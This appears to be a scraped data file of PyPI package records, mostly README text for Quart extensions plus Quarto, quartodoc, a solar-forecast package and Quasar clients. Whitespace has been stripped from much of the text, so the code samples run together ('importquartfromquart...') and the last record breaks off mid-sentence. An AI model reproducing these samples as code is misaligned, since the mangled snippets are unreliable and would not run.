app/extensions/__init__.pyimportquart_flask_patchfromflask_sqlalchemyimportSQLAlchemyfromquart_impimportImp_=quart_flask_patchimp=Imp()db=SQLAlchemy()# app/__init__.pyfromquartimportQuartfromapp.extensionsimportimp,dbdefcreate_app():app=Quart(__name__,static_url_path=\"/\")imp.init_app(app)imp.import_app_resources(files_to_import=[\"*\"],folders_to_import=[\"*\"])imp.import_blueprints(\"blueprints\")imp.import_models(\"models\")db.init_app(app)@app.before_servingasyncdefcreate_tables():db.create_all()returnapp"} +{"package": "quart-injector", "pacakge-description": "Quart InjectorDependency injecetion for quart apps.\ud83d\udee0 Installingpoetry add quart-injector\ud83c\udf93 Usageimporttypingimportquartimportinjectorimportquart_injectorGreeting=typing.NewType(\"Greeting\",str)defconfigure(binder:injector.Binder)->None:binder.bind(Greeting,to=\"Hello\")app=quart.Quart(__name__)@app.route(\"/\")@app.route(\"/\",defaults={\"name\":\"World\"})asyncdefgreeting_view(greeting:injector.Inject[Greeting],name:str)->str:returnf\"{greeting}{name}!\"quart_injector.wire(app,configure)\ud83d\udcda HelpSee theDocumentationor ask questions on theDiscussionboard.\u2696\ufe0f LicenceThis project is licensed under theMIT licence.All documentation and images are licenced under theCreative Commons Attribution-ShareAlike 4.0 International License.\ud83d\udcdd MetaThis project usesSemantic Versioning."} +{"package": "quart_minify", "pacakge-description": "quart_minifyA Quart extension to minify quart response for html, javascript, css and less compilation as well.Install:With pippip install quart-minifyFrom the source:git clone https://github.com/AceFire6/quart_minify.gitcd quart_minifypython setup.py installSetup:Inside Quart app:fromquartimportQuartfromquart_minify.minifyimportMinifyapp=Quart(__name__)Minify(app=app)Result:Before:

Example !

After:

Example !

Options:def__init__(self,app=None,html=True,js=False,cssless=True,cache=True,fail_safe=True,bypass=()):\"\"\"A Quart extension to minify flask response for html,javascript, css and less.@param: app Quart app instance to be passed (default:None).@param: js To minify the css output (default:False).@param: cssless To minify spaces in css (default:True).@param: cache To cache minifed response with hash (default: True).@param: fail_safe to avoid raising error while minifying (default True).@param: bypass a list of the routes to be bypassed by the minifierNotice: bypass route should be identical to the url_rule used for example:bypass=['/user/', '/users']\"\"\"Credit:Adapted fromflask_minifyhtmlmin: HTML python minifier.lesscpy: Python less compiler and css minifier.jsmin: JavaScript python minifier."} +{"package": "quart-mongo", "pacakge-description": "Quart MongoQuart-Mongo bridgesQuart,Motor, andOdmanticto create a powerful MongoDB extension to use in your Quart applications. It also provides some convenience helpers as well as being able to work withQuart-Schema.InstallationInstall the extension with the following command:$ pip3 install quart-mongoUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_mongo import Mongo\n\napp = Quart(__name__)\nbabel = Mongo(app)DocumentationThe documentation for Quart-Mongo and is availablehere."} +{"package": "quarto", "pacakge-description": "QuartoPython interface to Quarto, an academic, scientific, and technical publishing system built onPandoc.In addition to the core capabilities of Pandoc, Quarto includes:Support for embedding output from R and Python via integration with knitr and Jupyter.A project system for rendering groups of documents at once.Flexible ways to specify rendering options, including project-wide options and per-format options.Cross references for figures, tables, equations, sections, listings, proofs, and more.Sophisticated layout for panels of figures, tables, and other content.Automatic installation of required LaTeX packages when rendering PDF output.For more information on Quarto, see the project GitHub repositories athttps://github.com/quarto-dev/"} +{"package": "quart-oauth2-discord.py", "pacakge-description": "#Quart-OAuth2-Discord.pyA library to make the discord authentication system easier for Quart Users.To install this library:$python3-mpipinstallQuart-OAuth2-Discord.pyIf you're in Windows:python-mpipinstallQuart-OAuth2-Discord.pyAn example of Quart-app-with-Discord-BotfromtypingimportListfromquartimportQuart,redirect,render_template_string,request,url_forfromquart_oauth2_discord_pyimportDiscordOauth2Client,Guildapp=Quart(__name__)app.secret_key=b\"random bytes representing quart secret key\"app.config['DISCORD_CLIENT_ID']=\"Client ID here\"app.config['DISCORD_CLIENT_SECRET']='CLIENT_SECRET_HERE'app.config['SCOPES']=['identify','guilds']app.config['DISCORD_REDIRECT_URI']='http://127.0.0.1:5000/callback'app.config['DISCORD_BOT_TOKEN']=Noneclient=DiscordOauth2Client(app)@app.route('/')asyncdefindex():return\"Hello!\"@app.route('/login/',methods=['GET'])asyncdeflogin():returnawaitclient.create_session()@app.route('/callback')asyncdefcallback():awaitclient.callback()returnredirect(url_for('index'))defreturn_guild_names_owner(guilds_:List[Guild]):# print(list(sorted([fetch_guild.name for fetch_guild in guilds_ if fetch_guild.is_owner_of_guild()])))returnlist(sorted([fetch_guild.nameforfetch_guildinguilds_iffetch_guild.is_owner_of_guild()]))defsearch_guilds_for_name(guilds_,query):# print(list(sorted([fetch_guild.name for fetch_guild in guilds_ if fetch_guild.is_owner_of_guild() and fetch_guild.name == query])))returnlist(sorted([fetch_guild.nameforfetch_guildinguilds_iffetch_guild.is_owner_of_guild()andfetch_guild.name==query]))@app.route('/guilds')asyncdefguilds():template_string=\"\"\"Guilds

Your guilds:

    {% for guild_name in guild_names %}
  1. {{ guild_name }}
  2. {% endfor %}
\"\"\"ifrequest.args.get('guild_name'):returnawaitrender_template_string(template_string,guild_names=search_guilds_for_name(awaitclient.fetch_guilds(),request.args.get('guild_name')))returnawaitrender_template_string(template_string,guild_names=return_guild_names_owner(awaitclient.fetch_guilds()))@app.route('/me')@client.is_logged_inasyncdefme():user=awaitclient.fetch_user()image=user.avatar_url# noinspection HtmlUnknownTargetreturnawaitrender_template_string(\"\"\"

Login Successful

\"Avatar\"\"\",image_url=image)if__name__=='__main__':app.run()This is not yet documented. It will be documented soon."} +{"package": "quarto-cli", "pacakge-description": "QuartoQuarto is an open-source scientific and technical publishing system built onPandoc. Quarto documents are authored usingmarkdown, an easy to write plain text format.In addition to the core capabilities of Pandoc, Quarto includes:Embedding code and output from Python, R, Julia, and JavaScript via integration withJupyter,Knitr, andObservable.A variety of extensions to Pandoc markdown useful for technical writing including cross-references, sub-figures, layout panels, hoverable citations and footnotes, callouts, and more.A project system for rendering groups of documents at once, sharing options across documents, and producing aggregate output likewebsitesandbooks.Authoring using a wide variety of editors and notebooks includingJupyterLab,RStudio, andVS Code.Avisual markdown editorthat provides a productive writing interface for composing long-form documents.Learn more about Quarto athttps://quarto.org.InstallTo install the latest released version of Quarto, use:pipinstallquarto-cliNoteThe currentquarto-clipackage downloads required Quarto binary files from GitHub during installation. We are investigating providing pre-built wheel files to make installation more robust.UninstallTo uninstall thequarto-clipackage, use:pipuninstallquarto-cli"} +{"package": "quartodoc", "pacakge-description": "Overviewquartodoclets you quickly generate Python package API reference\ndocumentation using Markdown andQuarto. quartodoc\nis designed as an alternative toSphinx.Check out the below screencast for a walkthrough of creating a\ndocumentation site, or read on for instructions.Installationpython-mpipinstallquartodocor from GitHubpython-mpipinstallgit+https://github.com/machow/quartodoc.gitInstall QuartoIf you haven\u2019t already, you\u2019ll need toinstall\nQuartobefore you can use\nquartodoc.Basic useGetting started with quartodoc takes two steps: configuring quartodoc,\nthen generating documentation pages for your library.You can configure quartodoc alongside the rest of your Quarto site in\nthe_quarto.ymlfile you are already using for Quarto. Toconfigure\nquartodoc,\nyou need to add aquartodocsection to the top level your_quarto.ymlfile. Below is a minimal example of a configuration that\ndocuments thequartodocpackage:project:type:website# tell quarto to read the generated sidebarmetadata-files:-_sidebar.ymlquartodoc:# the name used to import the package you want to create reference docs forpackage:quartodoc# write sidebar data to this filesidebar:_sidebar.ymlsections:-title:Some functionsdesc:Functions to inspect docstrings.contents:# the functions being documented in the package.# you can refer to anything: class methods, modules, etc..-get_object-previewNow that you have configured quartodoc, you can generate the reference\nAPI docs with the following command:quartodocbuildThis will create areference/directory with anindex.qmdand\ndocumentation pages for listed functions, likeget_objectandpreview.Finally, preview your website with quarto:quartopreviewRebuilding siteYou can preview yourquartodocsite using the following commands:First, watch for changes to the library you are documenting so that your\ndocs will automatically re-generate:quartodocbuild--watchSecond, preview your site:quartopreviewLooking up objectsGenerating API reference docs for Python objects involves two pieces of\nconfiguration:the package name.a list of objects for content.quartodoc can look up a wide variety of objects, including functions,\nmodules, classes, attributes, and methods:quartodoc:package:quartodocsections:-title:Some sectiondesc:\"\"contents:-get_object# function: quartodoc.get_object-ast.preview# submodule func: quartodoc.ast.preview-MdRenderer# class: quartodoc.MdRenderer-MdRenderer.render# method: quartodoc.MDRenderer.render-renderers# module: quartodoc.renderersThe functions listed incontentsare assumed to be imported from the\npackage.Learning moreGoto the next\npageto\nlearn how to configure quartodoc sites, or check out these handy pages:Examples\npage: sites\nusing quartodoc.Tutorials\npage:\nscreencasts of building a quartodoc site.Docstring issues and\nexamples:\ncommon issues when formatting docstrings.Programming, the big\npicture:\nthe nitty gritty of how quartodoc works, and how to extend it."} +{"package": "quart-openapi", "pacakge-description": "Documentation can be found onhttps://factset.github.io/quart-openapi/Quart-OpenAPI is an extension forQuartthat adds support for generating a openapi.json file using openapi 3.0.\nIf you are familiar withQuart, this just wraps around it to add a openapi.json route similar toFlask-RESTXgenerating a swagger.json route and adds a Resource base class for building RESTful APIs.CompatibilityQuart-OpenAPI requires Python 3.6+ becauseQuartrequires it.Starting from version 1.6.0, Quart-OpenAPI requires python 3.7+ in order to avoid having to maintain multiple versions\nof function definitions for compatibility with the older versions ofQuartthat supported Python 3.6.InstallationYou can install via pip$pipinstallquart-openapiIf you are developing the module and want to also be able to build the documentation, make sure\nto also install the dependencies from the extras \u2018doc\u2019 package like so:$pipinstall'quart-openapi[doc]'$pythonsetup.pybuild_sphinxQuick StartIf you\u2019re familiar withQuartthen the quick start doesn\u2019t change much:fromquart_openapiimportPint,Resourceapp=Pint(__name__,title='Sample App')@app.route('/')classRoot(Resource):asyncdefget(self):'''Hello World Route\n\n This docstring will show up as the description and short-description\n for the openapi docs for this route.\n '''return\"hello\"This is equivalent to using the following withQuartas normal:fromquartimportQuartapp=Quart(__name__)@app.route('/')asyncdefhello():return\"hello\"Except that by usingPintandResourceit will also\nadd a route for \u2018/openapi.json\u2019 which will contain the documentation of the route and use the docstring for the\ndescription.Unit TestsUnit tests can be run through setuptools also:$pythonsetup.pytestRequest ValidationRequest validation like you can get withFlask-RESTX!You can either create validator models on the fly or you can create a jsonschema document for base models\nand then use references to it. For an on-the-fly validator:expected=app.create_validator('sample_request',{'type':'object','properties':{'foobar':{'type':'string'},'baz':{'oneOf':[{'type':'integer'},{'type':'number','format':'float'}]}}})@app.route('/')classSample(Resource):@app.expect(expected)asyncdefpost(self):# won't get here if the request didn't match the expected schemadata=awaitrequest.get_json()returnjsonify(data)The default content type is \u2018application/json\u2019, but you can specify otherwise in the decorator:{\"$schema\":\"http://json-schema.org/schema#\",\"id\":\"schema.json\",\"components\":{\"schemas\":{\"binaryData\":{\"type\":\"string\",\"format\":\"binary\"}}}}app=Pint(__name__,title='Validation Example',base_model_schema='schema.json')stream=app.create_ref_validator('binaryData','schemas')@app.route('/')classBinary(Resource):@app.expect((stream,'application/octet-stream',{'description':'gzip compressed data'}))@app.response(HTTPStatus.OK,'Success')asyncdefpost(self):# if the request didn't have a 'content-type' header with a value# of 'application/octet-stream' it will be rejected as invalid.raw_data=awaitrequest.get_data(raw=True)# ... do something with the datareturn\"Success!\"In the example above, it\u2019ll open, read, and json parse the fileschema.jsonand then use it as the basis\nfor referencing models and creating validators. Currently the validator won\u2019t do more than validate content-type\nfor content-types other than \u2018application/json\u2019."} +{"package": "quart-peewee", "pacakge-description": "Quart-PeeweeIntegration between theQuartweb framework and thePeewee ORMthrough thePeewee-AIOInstallationpip install quart-peeweeUsagefrompeewee_aio.fieldsimportCharFieldfromquartimportQuart,requestfromquart_peeweeimportQuartPeeweeapp=Quart(__name__)db=QuartPeewee(\"aiosqlite:///app.db\")db.init_app(app)classUser(db.Model):name=CharField(unique=True)@app.before_servingasyncdefbefore_serving():awaitdb.create_tables()@app.route(\"/create_user\",methods=[\"POST\"])asyncdefcreate_user():data=awaitrequest.get_json(force=True)awaitUser.create(name=data[\"name\"])return\"\"@app.route(\"/get_users\",methods=[\"GET\"])asyncdefget_users():returnawaitUser.select().dicts()@app.route(\"/delete_user\",methods=[\"DELETE\"])asyncdefdelete_user():data=awaitrequest.get_json(force=True)awaitUser.delete().where(User.name==data[\"name\"])return\"\"if__name__==\"__main__\":app.run()"} +{"package": "quart-rate-limiter", "pacakge-description": "Quart-Rate-Limiter is an extension forQuartto allow for rate limits to be\ndefined and enforced on a per route basis. The 429 error response\nincludes aRFC7231compliantRetry-Afterheader and the successful responses contain headers\ncompliant with theRateLimit Header Fields for HTTPRFC\ndraft.UsageTo add a rate limit first initialise the RateLimiting extension with\nthe application,app=Quart(__name__)rate_limiter=RateLimiter(app)or via the factory pattern,rate_limiter=RateLimiter()defcreate_app():app=Quart(__name__)rate_limiter.init_app(app)returnappNow this is done you can apply rate limits to any route by using therate_limitdecorator,@app.route('/')@rate_limit(1,timedelta(seconds=10))asyncdefhandler():...Or to apply rate limits to all routes within a blueprint by using thelimit_blueprintfunction,blueprint=Blueprint(\"name\",__name__)limit_blueprint(blueprint,1,timedelta(seconds=10))Or to apply rate limits to all routes in an app, define the default\nlimits when initialising the RateLimiter,rate_limiter=RateLimiter(default_limits=[RateLimit(1,timedelta(seconds=10))])and then to exempt a route,@app.route(\"/exempt\")@rate_exemptasyncdefhandler():...To alter the identification of remote users you can either supply a\nglobal key function when initialising the extension, or on a per route\nbasis.By default rate limiting information (TATs) will be stored in memory,\nwhich will result in unexpected behaviour if multiple workers are\nused. To solve this a redis store can be used by installing theredisextra (pip installquart-rate-limiter[redis]) and then\nusing as so,fromquart_rate_limiter.redis_storeimportRedisStoreredis_store=RedisStore(address)RateLimiter(app,store=redis_store)This store usesredis,\nand any extra keyword arguments passed to theRedisStoreconstructor will be passed to the rediscreate_redisfunction.A custom store is possible, see theRateLimiterStoreABCfor the\nrequired interface.Simple examplesTo limit a route to 1 request per second and a maximum of 20 per minute,@app.route('/')@rate_limit(1,timedelta(seconds=1))@rate_limit(20,timedelta(minutes=1))asyncdefhandler():...Alternatively thelimitsargument can be used for multiple limits,@app.route('/')@rate_limit(limits=[RateLimit(1,timedelta(seconds=1)),RateLimit(20,timedelta(minutes=1)),],)asyncdefhandler():...To identify remote users based on their authentication ID, rather than\ntheir IP,asyncdefkey_function():returncurrent_user.idRateLimiter(app,key_function=key_function)Thekey_functionis a coroutine function to allow session lookups\nif appropriate.ContributingQuart-Rate-Limiter is developed onGitHub. You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-Rate-Limiter is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThis README is the best place to start, after that try opening anissue."} +{"package": "quart-redis", "pacakge-description": "Quart-RedisAn easy way of setting up a redis connection in quart.Requirementsquart >= 0.18redis >= 4.2Example of Usepip install quart-redisfromquartimportQuartfromquart_redisimportRedisHandler,get_redisapp=Quart(__name__)app.config[\"REDIS_URI\"]=\"redis://localhost\"# override default connection attempts, set < 0 to disable# app.config[\"REDIS_CONN_ATTEMPTS\"] = 3redis_handler=RedisHandler(app)@app.route(\"/\")asyncdefindex():redis=get_redis()val=awaitredis.get(\"my-key\")ifvalisNone:awaitredis.set(\"my-key\",\"it works!\")val=awaitredis.get(\"my-key\")returnval"} +{"package": "quart-schema", "pacakge-description": "Quart-Schema is a Quart extension that provides schema validation and\nauto-generated API documentation. This is particularly useful when\nwriting RESTful APIs.Quart-Schema can use eithermsgspecorpydanticto validate.QuickstartQuart-Schema can validate an existing Quart route by decorating it\nwithvalidate_querystring,validate_request, orvalidate_response. It can also validate the JSON data sent and\nreceived over websockets using thesend_asandreceive_asmethods.fromdataclassesimportdataclassfromdatetimeimportdatetimefromquartimportQuart,websocketfromquart_schemaimportQuartSchema,validate_request,validate_responseapp=Quart(__name__)QuartSchema(app)@dataclassclassTodo:task:strdue:datetime|None@app.post(\"/\")@validate_request(Todo)@validate_response(Todo,201)asyncdefcreate_todo(data:Todo)->tuple[Todo,int]:...# Do something with data, e.g. save to the DBreturndata,201@app.websocket(\"/ws\")asyncdefws()->None:whileTrue:data=awaitwebsocket.receive_as(Todo)...# Do something with data, e.g. save to the DBawaitwebsocket.send_as(data,Todo)The documentation is served by default at/openapi.jsonaccording\nto the OpenAPI standard, or at/docsfor aSwaggerUIinterface, or/redocsfor\naredocinterface, or/scalarfor aScalarinterface. Note that there is currently no documentation standard for\nWebSockets.ContributingQuart-Schema is developed onGitHub. If you come across an\nissue, or have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-Schema is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Schemadocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-shell-ipython", "pacakge-description": "quart-shell-ipythongenerated from flask-shell-ipythonStart quart shell with ipython, if it installed"} +{"package": "quart-sqlalchemy", "pacakge-description": "Quart-SQLAlchemy provides a simple wrapper for SQLAlchemy made for humans. I\u2019ve kept things as\nsimple as possible, abstracted much complexity, and implemented everything using the current\nbest practices recommended by the SQLAlchemy developers and targets version 2.0.x+. As a\nconvenience, a framework adapter is provided for Quart, but the rest of this library is framework\nagnostic.The bundled SQLAlchemy object intentionally discards the use of scoped_session and it\u2019s async\ncounterpart. With version 2.x+, it\u2019s expected that sessions are short lived and vanilla and\ncontext managers are used for managing sesssion lifecycle. Any operations that intend to change\nstate should open an explicit transaction using the context manager returned by session.begin().\nThis pattern of usage prevents problems like sessions being shared between processes, threads, or\ntasks entirely, as opposed to the past conventions of mitigating this type of sharing. Another\nbest practice is expecting any transaction to intermittently fail, and structuring your logic to\nautomatically perform retries. You can find the retrying session context managers in the retry\nmodule.InstallingInstall and update usingpip:$ pip install quart-sqlalchemyInstall the latest release with unreleased pytest-asyncio fixes:$ pip install git+ssh://git@github.com/joeblackwaslike/quart-sqlalchemy.git#egg=quart_sqlalchemyInstall a wheel from our releases:$ pip install https://github.com/joeblackwaslike/quart-sqlalchemy/releases/download/v3.0.1/quart_sqlalchemy-3.0.1-py3-none-any.whlAdd to requirements.txt:quart-sqlalchemy @ https://github.com/joeblackwaslike/quart-sqlalchemy/releases/download/v3.0.1/quart_sqlalchemy-3.0.1-py3-none-any.whlA Simple Exampleimportsqlalchemyassaimportsqlalchemy.ormfromsqlalchemy.ormimportMapped,mapped_columnfromquartimportQuartfromquart_sqlalchemyimportSQLAlchemyConfigfromquart_sqlalchemy.frameworkimportQuartSQLAlchemyapp=Quart(__name__)db=QuartSQLAlchemy(config=SQLAlchemyConfigbinds=dict(default=dict(engine=dict(url=\"sqlite:///\",echo=True,connect_args=dict(check_same_thread=False),),session=dict(expire_on_commit=False,),))),app,)classUser(db.Model)__tablename__=\"user\"id:Mapped[int]=mapped_column(sa.Identity(),primary_key=True,autoincrement=True)name:Mapped[str]=mapped_column(default=\"default\")db.create_all()withdb.bind.Session()ass:withs.begin():user=User(username=\"example\")s.add(user)s.flush()s.refresh(user)users=s.scalars(sa.select(User)).all()print(user,users)assertuserinusersContributingFor guidance on setting up a development environment and how to make a\ncontribution to Quart-SQLAlchemy, see thecontributing guidelines."} +{"package": "quart-tasks", "pacakge-description": "Quart-Tasks is a Quart extension that provides scheduled background\ntasks.QuickstartQuart-Tasks is used by associating it with an app and then registering\nscheduled tasks,fromquartimportQuartfromquart_tasksimportQuartTasksapp=Quart(__name__)tasks=QuartTasks(app)@tasks.cron(\"*/5 * * * *\")# every 5 minutesasyncdefinfrequent_task():...# Do something@tasks.cron(seconds=\"*1/0\",# every 10 secondsminutes=\"*\",hours=\"*\",day_of_month=\"*\",month=\"*\",day_of_week=\"*\",)asyncdeffrequent_task():...# Do something@tasks.periodic(timedelta(seconds=10))asyncdefregular_task():...# Do SomethingNote: the non-standard cron format (for seconds) is as defined bycroniter.The tasks will then run in the background as the app itself runs or\nthey can be run manually via the CLIquartrun-tasks.ContributingQuart-Tasks is developed onGitHub. If you come across an issue,\nor have a feature request please open anissue. If you want to\ncontribute a fix or the feature-implementation please do (typo fixes\nwelcome), by proposing amerge request.TestingThe best way to test Quart-Tasks is withTox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Tasksdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-trio", "pacakge-description": "Quart-Trio is an extension forQuartto support theTrioevent loop. This is an\nalternative to using the asyncio event loop present in the Python\nstandard library and supported by default in Quart.QuickstartQuartTrio can be installed viapip,$pipinstallquart-trioand requires Python 3.8 or higher (seepython version supportfor reasoning).A minimal Quart example is,fromquartimportwebsocketfromquart_trioimportQuartTrioapp=QuartTrio(__name__)@app.route('/')asyncdefhello():return'hello'@app.websocket('/ws')asyncdefws():whileTrue:awaitwebsocket.send('hello')app.run()if the above is in a file calledapp.pyit can be run as,$pythonapp.pyTo deploy in a production setting see thedeploymentdocumentation.ContributingQuart-Trio is developed onGitHub. You are very welcome to\nopenissuesor\nproposemerge requests.TestingThe best way to test Quart-Trio is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpTheQuart-TrioandQuartdocumentation are the best\nplaces to start, after that try searchingstack overflow, if you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart-uploads", "pacakge-description": "Quart UploadsQuart-Uploads allows your application to flexibly and efficiently handle file\nuploading and serving the uploaded files.You can create different sets of uploads - one for document attachments, one\nfor photos, etc. - and the application can be configured to save them all in\ndifferent places and to generate different URLs for them.For more information on Quart,visit hereQuart-Uploads is based onFlask-Uploadsby maxcountryman."} +{"package": "quartustcl", "pacakge-description": "quartustclquartustclis a Python module to interact with Intel Quartus Tcl\nshells. It opens a single shell in a subprocess, then helps you with\nreading and writing data to it, and parsing Tcl lists.InstallationInstall viapip:pipinstallquartustclDemoYou can start a demo Python REPL by running the package as a script:python3-mquartustclThequartustclsubshell is exposed in a variable namedquartus.Basic UseInstantiate aQuartusTclobject to start a shell. Then, call methods\non it.quartus=quartustcl.QuartusTcl()three=quartus.expr('1 + 2')assertthree=='3'If you are expecting a list as a result, useparseto turn Tcl lists\ninto Python lists.devnames=quartus.parse(quartus.get_device_names(hardware_name=\"Foo Bar\"))In the Tcl subshell, this runsget_device_names-hardware_name{FooBar}and parses the result into a Python list.For more detailed information, pleaseread the documentation."} +{"package": "quart-wtf", "pacakge-description": "Quart-WTFSimple integration of Quart and WTForms. Including CSRF and file uploading."} +{"package": "quart-wtforms", "pacakge-description": "Quart-WTFSimple integration of Quart and WTForms. Including CSRF and file uploading.DocumentationThe documentation for Quart-WTF is availablehere."} +{"package": "quartz", "pacakge-description": "No description available on PyPI."} +{"package": "quartz-solar-forecast", "pacakge-description": "Quartz Solar ForecastThe aim of the project is to build an open source PV forecast that is free and easy to use.\nThe forecast provides the expected generation inkwfor 0 to 48 hours for a single PV site.Open Climate Fix also provides a commercial PV forecast, please get in touch atquartz.support@openclimatefix.orgThe current model uses GFS or ICON NWPs to predict the solar generation at a sitefromquartz_solar_forecast.forecastimportrun_forecastfromquartz_solar_forecast.pydantic_modelsimportPVSite# make a pv site objectsite=PVSite(latitude=51.75,longitude=-1.25,capacity_kwp=1.25)# run model, uses ICON NWP data by defaultpredictions_df=run_forecast(site=site,ts='2023-11-01')Which gives the following predictionInstallationThe source code is currently hosted on GitHub at:https://github.com/openclimatefix/Open-Source-Quartz-Solar-ForecastBinary installers for the latest released version are available at the Python Package Index (PyPI)pipinstallquartz-solar-forecastYou might need to install the following packages firstcondainstall-cconda-forgepyresampleThis can solve thebug: ___kmpc_for_static_fini.ModelThe model is a gradient boosted tree model and uses 9 NWP variables.\nIt is trained on 25,000 PV sites with over 5 years of PV history, which is availablehere.\nThe training of this model is handled inpv-site-predictionTODO - we need to benchmark this forecast.The 9 NWP variables, from Open-Meteo documentation, are mentioned above with their appropariate units.Visibility (km), or vis: Distance at which objects can be clearly seen. Can affect the amount of sunlight reaching solar panels.Wind Speed at 10 meters (km/h), or si10 : Wind speed measured at a height of 10 meters above ground level. Important for understanding weather conditions and potential impacts on solar panels.Temperature at 2 meters (\u00b0C), or t : Air temperature measure at 2 meters above the ground. Can affect the efficiency of PV systems.Precipiration (mm), or prate : Precipitation (rain, snow, sleet, etc.). Helps to predict cloud cover and potentiel reductions in solar irradiance.Shortwave Radiation (W/m\u00b2), or dswrf: Solar radiation in the shortwave spectrum reaching the Earth's surface. Measure of the potential solar energy available for PV systems.Direct Radiation (W/m\u00b2)or dlwrf: Longwave (infrared) radiation emitted by the Earth back into the atmosphere.confirm it is correctCloud Cover low (%), or lcc: Percentage of the sky covered by clouds at low altitudes. Impacts the amount of solar radiation reachign the ground, and similarly the PV system.Cloud Cover mid (%), or mcc : Percentage of the sky covered by clouds at mid altitudes.Cloud Cover high (%), or lcc : Percentage of the sky covered by clouds at high altitudeWe also use the following featurespoa_global: The plane of array irradiance, which is the amount of solar radiation that strikes a solar panel.poa_global_now_is_zero: A boolean variable that is true if the poa_global is zero at the current time. This is used to help the model learn that the PV generation is zero at night.capacity (kw): The capacity of the PV system in kw.The model also has a feature to check if these variables are NaNs or not.The model also uses the following variables, which are currently all set to nanrecent_power: The mean power over the last 30 minutesh_mean: The mean of the recent pv data over the last 7 daysh_median: The median of the recent pv data over the last 7 daysh_max: The max of the recent pv data over the last 7 daysKnown restrictionsThe model is trained onUK MetOfficeNWPs, but when running inference we useGFSdata fromOpen-meteo. The differences between GFS and UK MetOffice could led to some odd behaviours.It looks like the GFS data on Open-Meteo is only available for free for the last 3 months.EvaluationTo evaluate the model we use theUK PVdataset and theICON NWPdataset.\nAll the data is publicly available and the evaluation script can be run with the following commandpythonscripts/run_evaluation.pyThe test dataset we used is defined inquartz_solar_forecast/dataset/testset.csv.\nThis contains 50 PV sites, which 50 unique timestamps. The data is from 2021.The results of the evaluation are as follows\nThe MAE is 0.1906 kw across all horizons.HorizonsMAE [kw]MAE [%]00.202 +- 0.036.210.211 +- 0.036.420.216 +- 0.036.53 - 40.211 +- 0.026.35 - 80.191 +- 0.0169 - 160.161 +- 0.01517 - 240.173 +- 0.015.324 - 480.201 +- 0.016.1If we exclude nighttime, then the average MAE [%] from 0 to 36 forecast hours is 13.0%.Notes:The MAE in % is the MAE divided by the capacity of the PV site. We acknowledge there are a number of different ways to do this.It is slightly surprising that the 0-hour forecast horizon and the 24-48 hour horizon have a similar MAE.\nThis may be because the model is trained expecting live PV data, but currently in this project we provide no live PV data.AbbreviationsNWP: Numerical Weather PredictionsGFS: Global Forecast SystemPV: PhotovoltaicMAE: Mean Absolute ErrorICON: ICOsahedral NonhydrostaticKW: KilowattContributionWe welcome other models.Contributors \u2728Thanks goes to these wonderful people (emoji key):Peter Dudfield\ud83d\udcbbMegawattz\ud83e\udd14\ud83d\udce2EdFage\ud83d\udcd6\ud83d\udcbbChloe Pilon Vaillancourt\ud83d\udcd6rachel tipton\ud83d\udce2armenbod\ud83d\udd8b\ud83d\udcbbShreyas Udaya\ud83d\udcd6Aryan Bhosale\ud83d\udcd6Francesco\ud83d\udcbbThis project follows theall-contributorsspecification. Contributions of any kind welcome!"} +{"package": "quasar-client", "pacakge-description": "Quasar Python ClientInstallationpipinstallquasar-clientUsagefromquasar_clientimportQuasarquasar_base=\"URL for Quasar-compatible server\"quasar=Quasar(quasar_base=quasar_base)# Use OpenAI-compatible interfaces...chat_completion=quasar.chat.completions.create(messages=[{\"role\":\"user\",\"content\":\"Hello quasar\",}],model=\"gpt-3.5-turbo\",)# Use Quasar-specific interfaces like NER...entities=quasar.tagger.tag(task=\"ner\",text=\"Yurts Technologies is based in SF.\")Quasar provides a convenient interface for common RAG APIs. In addition to the OpenAI APIs, the client supports:EntitiesEmbeddingRankingAsynchronous SupportFor developers looking to leverage asynchronous programming for improved performance and non-blocking IO operations, Quasar introduces async support for its APIs. This allows you to efficiently handle large volumes of requests and data processing in a non-blocking manner.Async Usage ExampleBelow is an example of how to use the asynchronous interface for embedding texts:fromquasar_clientimportAsyncQuasarquasar_base=\"URL for Quasar-compatible server\"quasar=AsyncQuasar(quasar_base=quasar_base)# Asynchronously embed textsasyncdefembed_texts(texts):embeddings=awaitquasar.embedding.embed(texts=texts)returnembeddings# Example textstexts=[\"Hello, world!\",\"How are you?\"]# Remember to run this in an async contextThis async support ensures that your application can scale more efficiently, handling concurrent operations without the need for complex threading or multiprocessing setups.Sync and Async Resource ModulesQuasar provides both synchronous and asynchronous resource classes to cater to different use cases and preferences. Whether you prefer the simplicity of synchronous code or the efficiency of asynchronous operations, Quasar has you covered.# Synchronous Embedding Resource ClassclassSyncEmbeddingResource(SyncResource):...# Asynchronous Embedding Resource ClassclassAsyncEmbeddingResource(AsyncResource):..."} +{"package": "quasardb", "pacakge-description": "No description available on PyPI."} +{"package": "quasargui", "pacakge-description": "#QuasarGUI\nA user-friendly package for making awesome-looking desktop apps in Python.Read thefull documentationhere.Compatibility:It runs flawlessly on Mac, 10.13.6+ (High Sierra or newer).Linux compatibility: unknown, it depends oncefpython3's andpywebview's linux compatibility.Windows compatibility: compatible with Windows 7, on Windows 10pywebviewdid not work (2021-07-30).Usage:This GUI library creates a window with a html view, in which Quasar Vue system is running. But don't worry, you can build up everything in python.A window is built up of Component's and the components correspond to components described in (https://quasar.dev/vue-components/). Quasar is very well-documented and so it makes this project well-documented. From Quasar's help page you can use all props, classes, as well as you can easily customize the look of your Components using CSS.You can react to user events using callbacks. (See: simple greeter app.)###Hello worldimportquasarguifromquasarguiimport*layout=QLayout([\"Hello World!\"])quasargui.run(layout)###Simple greeter appThis app demonstrates how you can build up a simple form and use the form's data to run your 